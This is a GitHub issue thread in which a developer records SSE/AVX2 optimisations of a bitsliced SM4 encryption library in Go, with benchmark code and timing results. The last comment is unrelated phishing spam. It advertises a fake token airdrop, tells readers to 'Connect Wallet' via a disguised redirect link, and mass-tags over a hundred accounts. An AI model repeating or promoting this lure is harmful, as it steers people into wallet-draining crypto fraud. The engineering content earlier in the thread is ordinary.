### ISSUE TITLE
128、256组并行加密持续优化

### ISSUE THREAD

**Issue by emmansun** [emmansun/sm4bs#1]
已经优化：

1. 减少申请临时内存（make）请求。
2. 减少left rotation 的内存copy操作。
3. round key扩展的asm sse优化。
4. transpose 128的asm sse优化。
5. 基本128位逻辑操作已用asm sse优化。

继续优化方向：

- [x] sbox128直接用asm sse改写。[提交](https://github.com/emmansun/sm4bs/commit/c691551307f4b640bfd839a05b2cf527f9ec5303)
- [x] round key扩展与第一个异或操作合并进行，xorRK(rk, b0, b1, b2)用asm改写。[提交](https://github.com/emmansun/sm4bs/commit/7b0f00c3f41a6be18b902eaac22f2a8dadd6175f)
- [x] 测试和尝试优化线性变换L的性能。[提交](https://github.com/emmansun/sm4bs/commit/eba02b8d389cd887c80a706e62d5538ed4448759)
- [x] transpose 128用avx2实现。
- [x] xor32用avx2实现。[提交](https://github.com/emmansun/sm4bs/commit/db93bcc8c1a2b3c0c320524bd513101091ff1f40)
- [x] 取消最后b0,b1,b2,b3逆序拷贝，提供一个特殊的transpose 128实现。
- [x]  Improve bit transpose performance，主要思路是减少内存操作。
- [x] 用王磊、龚征等的sbox实现，减少逻辑操作，特别是NOT操作。
- [x] xor32和l操作合并，减少内存和寄存器数据交换。
- [x] slice bounds check elimination

**Comment by emmansun** [comment]
AES-NI + AVX2 128组性能：
```golang
func BenchmarkAESNIEncrypt128Blocks(b *testing.B) {
	key := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10}
	c, err := sm4.NewCipher(key)
	if err != nil {
		b.Fatal(err)
	}
	encrypter := cipher.NewECBEncrypter(c)
	input := make([]byte, 128*16)
	output := make([]byte, 128*16)
	for i := 0; i < 128; i++ {
		copy(input[i*16:], key)
	}
	b.SetBytes(int64(128*16))
	b.ReportAllocs()
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		encrypter.CryptBlocks(output, input)
	}
}
```
Result (就算平均4000ns/op):
```
goos: windows
goarch: amd64
pkg: github.com/emmansun/sm4bitsliced
cpu: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz
BenchmarkAESNIEncrypt128Blocks-6   	  297854	      3972 ns/op	 515.63 MB/s	       0 B/op	       0 allocs/op
```

**Comment by emmansun** [comment]
优化后的性能大概就这样了。

```
goos: windows
goarch: amd64
pkg: github.com/emmansun/sm4bs
cpu: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz
BenchmarkXor32-6   	84093679	        13.37 ns/op
BenchmarkXorRK-6   	37912296	        31.48 ns/op
BenchmarkL128-6   	56766843	        20.75 ns/op	       0 B/op	       0 allocs/op
BenchmarkTao128-6  	11263924	       107.4 ns/op	       0 B/op	       0 allocs/op
BenchmarkBS128Transpose-6   	 1000000	      1054 ns/op	       0 B/op	       0 allocs/op
BenchmarkBS128TransposeRev-6   	 1000000	      1041 ns/op	       0 B/op	       0 allocs/op
BenchmarkEncrypt128Blocks-6   	  138842	      8526 ns/op	 240.20 MB/s	    3072 B/op	       2 allocs/op
```

**Comment by emmansun** [comment]
- [ ] Improve bit transpose performance

**Comment by emmansun** [comment]
```
goos: windows
goarch: amd64
pkg: github.com/emmansun/sm4bs
cpu: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz
BenchmarkEncrypt128Blocks-6   	  156128	      7246 ns/op	 282.63 MB/s	    3072 B/op	       2 allocs/op
```

**Comment by emmansun** [comment]
- [ ] 用王磊、龚征等的sbox实现，减少逻辑操作，特别是NOT操作

**Comment by emmansun** [comment]
256组并行加密性能：

```
goos: windows
goarch: amd64
pkg: github.com/emmansun/sm4bs
cpu: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz
BenchmarkSbox256-6   	68508790	        17.99 ns/op	       0 B/op	       0 allocs/op
BenchmarkTao256-6   	13837366	        88.67 ns/op	       0 B/op	       0 allocs/op
BenchmarkL256-6   	60229776	        19.20 ns/op	       0 B/op	       0 allocs/op
BenchmarkXorRK256-6   	35646387	        34.23 ns/op	       0 B/op	       0 allocs/op
BenchmarkXor32x256-6   	54216703	        21.92 ns/op	       0 B/op	       0 allocs/op
BenchmarkEncrypt256Blocks-6   	  132698	      8964 ns/op	 456.93 MB/s	    6144 B/op	       2 allocs/op
```

**Comment by emmansun** [comment]
xor32和l操作合并，减少内存和寄存器数据交换。
现在L操作合并了xor32，性能稍降，但整体性能提升不少。
```
goos: windows
goarch: amd64
pkg: github.com/emmansun/sm4bs
cpu: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz
BenchmarkL256-6   	50736309	        22.45 ns/op	       0 B/op	       0 allocs/op
BenchmarkEncrypt256Blocks-6   	  145350	      8104 ns/op	 505.45 MB/s	    6144 B/op	       2 allocs/op
```

**Comment by emmansun** [comment]
经过"slice bounds check elimination"，256组并行bit slicing sm4加密终于打败了“目前”的AES-NI + AVX2方案。

**Comment by phieule2024** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
nickwong, @Sweetness1122, @hanhhuong351607, @mustang2247, @BaofengWu, @unnecessarythings619, @RudaBecia, @crossle, @carlito5555, @MrThankrp, @danBamikiya, @satisatanica, @mondor11, @quanweiDu, @albertolive, @samariluzi, @ayuLiao, @ThunkyBin, @Halcyon3211, @deuonur, @Norisk86, @exced, @umitozen, @korkmazmutlu, @Faial2598, @deppnerkeiswetteroljx9432, @edaeray, @gonzluks4, @rogerchen2020, @TrashxPandaArt, @zocc420, @dzfjz, @ckirejevas, @qeretasana, @alex159159, @oksana44, @m-e-m-f-i-s-19, @ivanmetrikin, @inna-zinovieva-ext, @shanmukhipriya99, @Raistx, @liuhailong2022, @mollie54, @nordca, @Hummingbird1322, @lowade, @folandarian, @abdallah-mohamedQA, @allexjase, @ryujunhyeonggeeeekegeeeeke, @Dargon789, @laviniamarchettaqbtuz6971, @jackson-clerkenwell-labs, @richardo2016x, @bungeelee, @kava-support, @0xRake, @NeTotMark, @Barun0019b, @NumanErdem, @jeprox23, @atelomycterus, @MarcinSPro, @Vid201, @williamlsh, @J-Lw, @Jpman64, @Operation04785, @gimogo, @noelily, @Nar035, @patilopasara, @Linda-OC, @omearaj, @isabella232, @Bird6777, @tarn1902, @taerbao, @zksamsahara, @fakemonkgin, @busehoyrat, @AndyFi1, @lowk3v, @Muha66, @nickwong, @Anomours, @DATA-GaMi, @gunsolusstommesdkds3180, @yuri214, @Pigeon418, @turkingtonbantingy2652, @Aleph-works, @Miguer-dev, @sanskarkhare, @maurogg69, @hnzzwzx, @piaere, @tridetch, @pucedotethjc0803kevin, @Ladonna71999, @erenaslandev, @ajonsjames, @pemiake, @kkhuaa, @gunrosen, @vladel131313, @Annabella77, @jaybuidl, @Acarlosr, @shobeirimajid, @hanhanh883645, @Marthevin, @daniel837030, @SlackSilencer, @gaphudu, @miladtrade, @FARUK-YILDIRIM, @pratikbin, @mvpchenxin, @hanhhuong351607, @igumus, @Sunil8140, @ravindracrypto, @bariscangungor, @Astalf, @phsmany, @fowlesdavohn, @Kavitharavih, @davirds, @Rogcent03, @zadpeck, @owibing1, @timurbekas, @arijitdutta67, @cohrondrekaftpqh4405, @Livingroom83887, @Vinicius140394, @Canary110, @NunungDakira, @mantle0x, @peradise2021, @domnicaparis63, @kopwatina, @sinmoonn, @pedrovalido, @tyhessiajavionna, @thewhitewizard, @Fang-Zhang
